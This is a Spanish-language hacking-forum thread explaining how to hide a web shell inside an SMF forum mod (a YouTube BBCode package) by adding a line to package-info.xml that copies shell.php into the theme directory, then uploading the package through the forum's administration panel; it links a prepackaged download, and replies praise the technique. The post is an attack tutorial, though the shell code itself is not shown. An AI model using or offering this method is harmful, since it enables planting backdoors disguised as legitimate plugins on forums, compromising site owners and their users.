Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Subir Shell desde la Administración de un foro SMF

  • 2 Respuestas
  • 4844 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Rootscale

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
  • From noob to root in 5 seconds
    • Ver Perfil
« en: Junio 27, 2012, 05:06:14 pm »
Hola amigos de underc0de , realizando mi primer post les traigo un mod cualquiera en este caso mod youtube , implementado con una shell , esta shell se infiltrará dentro de la modificacion de la siguiente manera.

Archivo por defecto de un mod smf :
package-info.xml
Código: [Seleccionar]
<?xml version="1.0"?>
<!DOCTYPE package-info SYSTEM "http://www.simplemachines.org/xml/package-info">
<package-info xmlns="http://www.simplemachines.org/xml/package-info" xmlns:smf="http://www.simplemachines.org/">
<name>YouTube BBCode</name>
<id>karlbenson:youtubebbcode</id>
<type>modification</type>
<version>2.6</version>

<!--// Install for SMF 1.1.x versions only //-->
<install for="1.1 - 1.1.99">
<readme type="file" parsebbc="true">readme.txt</readme>
<modification>install-1.1.x.xml</modification>
<modification>languagestrings.xml</modification>
<require-file name="youtube.gif" destination="$imagesdir/bbc" />
</install>

<!--// Uninstall for SMF 1.1.x versions only //-->
<uninstall for="1.1 - 1.1.99">
<modification reverse="true">install-1.1.x.xml</modification>
<modification reverse="true">languagestrings.xml</modification>
<remove-file name="$imagesdir/bbc/youtube.gif" />
</uninstall>

<!--// Install for SMF 2.0 Beta 2/3/4 and above //-->
<install for="2.0 - 2.99.99">
<readme type="file" parsebbc="true">readme.txt</readme>
<modification>install-2.0.xml</modification>
<modification>languagestrings.xml</modification>
<require-file name="youtube.gif" destination="$imagesdir/bbc" />

</install>

<!--// Uninstall for SMF 2.0 Beta 2/3/4 and above //-->
<uninstall for="2.0 - 2.99.99">
<modification reverse="true">install-2.0.xml</modification>
<modification reverse="true">languagestrings.xml</modification>
<remove-file name="$imagesdir/bbc/youtube.gif" />
</uninstall>
</package-info>


Para implementar la shell dentro de cualquier mod , tenemos que agregar la siguiente linea de código:
<require-file name="shell.php" destination="$themedir" />
Con esto decimos que requerimos que dentro de la carpeta del mod un archivo llamado shell.php , y que se alojara en /Themes/Default , por eso decimos destination="$themedir" .

agregando la linea de codigo quedaria asi:
Código: [Seleccionar]
<?xml version="1.0"?>
<!DOCTYPE package-info SYSTEM "http://www.simplemachines.org/xml/package-info">
<package-info xmlns="http://www.simplemachines.org/xml/package-info" xmlns:smf="http://www.simplemachines.org/">
<name>YouTube BBCode</name>
<id>karlbenson:youtubebbcode</id>
<type>modification</type>
<version>2.6</version>

<!--// Install for SMF 1.1.x versions only //-->
<install for="1.1 - 1.1.99">
<readme type="file" parsebbc="true">readme.txt</readme>
<modification>install-1.1.x.xml</modification>
<modification>languagestrings.xml</modification>
<require-file name="youtube.gif" destination="$imagesdir/bbc" />
<require-file name="shell.php" destination="$themedir" />
</install>

<!--// Uninstall for SMF 1.1.x versions only //-->
<uninstall for="1.1 - 1.1.99">
<modification reverse="true">install-1.1.x.xml</modification>
<modification reverse="true">languagestrings.xml</modification>
<remove-file name="$imagesdir/bbc/youtube.gif" />
</uninstall>

<!--// Install for SMF 2.0 Beta 2/3/4 and above //-->
<install for="2.0 - 2.99.99">
<readme type="file" parsebbc="true">readme.txt</readme>
<modification>install-2.0.xml</modification>
<modification>languagestrings.xml</modification>
<require-file name="youtube.gif" destination="$imagesdir/bbc" />
<require-file name="shell.php" destination="$themedir" />
</install>

<!--// Uninstall for SMF 2.0 Beta 2/3/4 and above //-->
<uninstall for="2.0 - 2.99.99">
<modification reverse="true">install-2.0.xml</modification>
<modification reverse="true">languagestrings.xml</modification>
<remove-file name="$imagesdir/bbc/youtube.gif" />
</uninstall>
</package-info>

Nos queda copiar la shell.php en la carpeta de la modificacion smf.
Una vez copiada , comprimimos el mod en .zip.
Y tendriamos lista la shell para subirla por la administracion del foro smf !





Aqui les dejo un video por si no entendieron.



Link de descarga del mod listo y empaquetado :
http://9b4b807e.linkbucks.com
« Última modificación: Enero 18, 2013, 10:54:32 pm por Rootscale »

Desconectado Dedalo

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • KUSH
    • Ver Perfil
    • Twitter Personal
  • Twitter: https://twitter.com/SeguridadBlanca
« Respuesta #1 en: Junio 27, 2012, 08:18:08 pm »
Excelente post :) Muy interesante método.


http://underc0de.org/foro/bugs-y-exploits/shell-upload-en-conocidos-cms/



Saludos,
Dedalo

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #2 en: Junio 28, 2012, 12:00:20 am »
Buena tecnica!!! gracias por aportarla!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!



Blind SQLi desde cero [SQLi a ciegas] by ANTRAX

Iniciado por ANTRAX

Respuestas: 20
Vistas: 12730
Último mensaje Julio 27, 2014, 01:04:47 am
por DRAKONE
[Curso] SQL Injection desde 0 - Union based y Blind Boolean Based.

Iniciado por M5f3r0

Respuestas: 8
Vistas: 13124
Último mensaje Abril 21, 2017, 04:36:34 am
por M5f3r0
Routerpwn, un framework para explotar dispositivos embebidos desde tu celular

Iniciado por hkm

Respuestas: 2
Vistas: 3559
Último mensaje Agosto 01, 2011, 11:45:43 pm
por JaAViEr
Videos Metasploit desde básico hasta avanzado

Iniciado por dvdr

Respuestas: 24
Vistas: 23363
Último mensaje Abril 28, 2016, 11:40:55 am
por Satyricon
Analisis de un Buffer Overflow desde codigo muerto

Iniciado por PerverthsO

Respuestas: 1
Vistas: 2840
Último mensaje Junio 02, 2015, 07:24:05 am
por .:UND3R:.